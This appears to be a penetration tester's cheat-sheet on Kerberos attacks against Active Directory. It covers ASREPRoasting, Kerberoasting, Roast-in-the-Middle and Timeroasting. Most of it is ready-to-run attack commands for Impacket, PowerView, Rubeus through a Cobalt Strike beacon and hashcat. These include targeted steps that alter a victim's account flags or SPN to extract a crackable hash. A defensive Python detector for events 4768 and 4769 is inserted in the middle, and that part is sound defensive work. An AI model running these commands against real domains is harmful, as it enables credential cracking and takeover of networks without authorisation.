ASREPRoasting
Show domain users with DONT_REQ_PREAUTH flag set:
PowerView3 > Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Normal
GetNPUsers.py
$ GetNPUsers.py megacorp.local/ -dc-ip 127.0.0.1 -no-pass -usersfile ~/ws/enum/names.txt -request -outputfile asrep.in | tee GetNPUsers.out
$ cat GetNPUsers.out | grep -v 'Client not found in Kerberos database'
$ hashcat -m 18200 -O -a 0 -w 3 --session=asrep -o asrep.out asrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
ASREPRoast.ps1
PS > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
Rubeus
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
beacon> execute-assembly Rubeus.exe asreproast /nowrap [/user:svc_mssql]
Targeted
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
ASREPRoast > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
Kerberoasting
Check the msDS-SupportedEncryptionTypes attribute (whether RC4 is enabled):
PowerView3 > Get-DomainUser -Identity snovvcrash -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
Normal
GetUserSPNs.py
$ GetUserSPNs.py megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 127.0.0.1 -request -outputfile tgsrep.in
$ hashcat -m 13100 -O -a 0 -w 3 --session=tgsrep -o tgsrep.out tgsrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
$ cat ~/ws/enum/tgsrep.in | grep -Pho 'krb5tgs\$23\$.*?\$' | cut -d'*' -f2 | cut -d'$' -f1 > t
$ for acc in `cat t`; do grep -ai $acc ~/ws/loot/ntds.cracked | cut -d: -f1 >> t2; done && rm t
$ vi t2
...convert domain prefix to domain suffix (megacorp.local\svcsql -> svcsql@megacorp.local)...
$ python3 max.py -u neo4j -p 'WeaponizeK4li!' mark-owned -f t2 --add-note "kerberoasted" && rm t2
$ python3 max.py -u neo4j -p 'WeaponizeK4li!' query -q 'MATCH p=shortestPath((n {owned:true})-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p' --path
PowerView
PowerView3 > Invoke-Kerberoast -OutputFormat Hashcat | fl
Rubeus
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(servicePrincipalName=*))"
beacon> execute-assembly Rubeus.exe kerberoast /format:hashcat /nowrap [/usetgtdeleg] [/user:svc_mssql]
Targeted
PowerView3 > Get-DomainUser snovvcrash | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
PowerView3 > $User = Get-DomainUser snovvcrash
PowerView3 > $User | Get-DomainSPNTicket | fl
PowerView3 > $User | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -Clear serviceprincipalname
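Added defender-side example (not part of the original notebook) covering both the ASREPRoasting and Kerberoasting sections above: a Python heuristic run over constructed DC security events 4768 (TGT request) and 4769 (TGS request) that flags no-pre-auth RC4 TGT requests and bursts of RC4 service tickets from one source. Field names follow those events' EventData; the threshold and sample values are assumptions.

```python
from collections import defaultdict

RC4_HMAC = "0x17"       # TicketEncryptionType for RC4-HMAC; AES128/AES256 are 0x11/0x12
PREAUTH_NONE = "0"      # PreAuthType 0 = "logon without pre-authentication"
MIN_DISTINCT_SPNS = 3   # assumed threshold: distinct RC4 service tickets per source IP

def detect_roasting(events):
    """Return {IpAddress: [alert, ...]} for the two roasting patterns.

    AS-REP roast: 4768 with PreAuthType 0 and an RC4 ticket, i.e. a TGT issued
    to an account with DONT_REQ_PREAUTH set without any pre-authentication.
    Kerberoast: 4769 RC4 service tickets for >= MIN_DISTINCT_SPNS distinct user
    (non-machine) service accounts from one source, the pattern left behind when
    every SPN account in the domain is requested in one sweep.
    """
    alerts = defaultdict(list)
    rc4_tgs = defaultdict(set)  # IpAddress -> service accounts requested with RC4
    for ev in events:
        eid, src = ev["EventID"], ev["IpAddress"]
        if (eid == 4768 and ev["PreAuthType"] == PREAUTH_NONE
                and ev["TicketEncryptionType"] == RC4_HMAC):
            alerts[src].append(f"AS-REP roast: {ev['TargetUserName']} (no pre-auth, RC4 TGT)")
        elif eid == 4769 and ev["TicketEncryptionType"] == RC4_HMAC:
            svc = ev["ServiceName"]
            # machine accounts ($) and krbtgt have long random keys; only user SPNs are crackable
            if not svc.endswith("$") and svc.lower() != "krbtgt":
                rc4_tgs[src].add(svc)
    for src, svcs in rc4_tgs.items():
        if len(svcs) >= MIN_DISTINCT_SPNS:
            alerts[src].append(f"Kerberoast: RC4 TGS for {len(svcs)} service accounts {sorted(svcs)}")
    return dict(alerts)

# Constructed sample events (not real log data); keys mirror the EventData fields.
SAMPLE_EVENTS = [
    {"EventID": 4768, "IpAddress": "10.0.0.50", "TargetUserName": "svc_backup",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "IpAddress": "10.0.0.20", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "IpAddress": "10.0.0.50", "ServiceName": "svc_mssql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "IpAddress": "10.0.0.50", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "IpAddress": "10.0.0.50", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "IpAddress": "10.0.0.20", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "IpAddress": "10.0.0.20", "ServiceName": "svc_mssql", "TicketEncryptionType": "0x12"},
]

if __name__ == "__main__":
    for src, found in detect_roasting(SAMPLE_EVENTS).items():
        print(src, *found, sep="\n  ")
```

The RC4 condition is what makes msDS-SupportedEncryptionTypes worth auditing: service accounts limited to AES produce 0x12 tickets and never trip the Kerberoast rule.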
Roast-in-the-Middle
$ sudo ritm -t/--target 192.168.1.123 -g/--gateway 192.168.1.1 -d/--dc-ip 192.168.1.11 -u/--users-file users.txt
Downgrading Encryption Type (RC4)
Timeroasting
$ python3 timeroast.py -a 50 -t 120 -o sntp.in 192.168.1.11
$ hashcat -m31300 -O -a0 -w3 --session=sntp -o sntp.out sntp.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
$ hashcat -m10 -O -a0 -w3 --session=sntp -o sntp.out sntp.in nthashes.txt --hex-wordlist --hex-salt
Targeted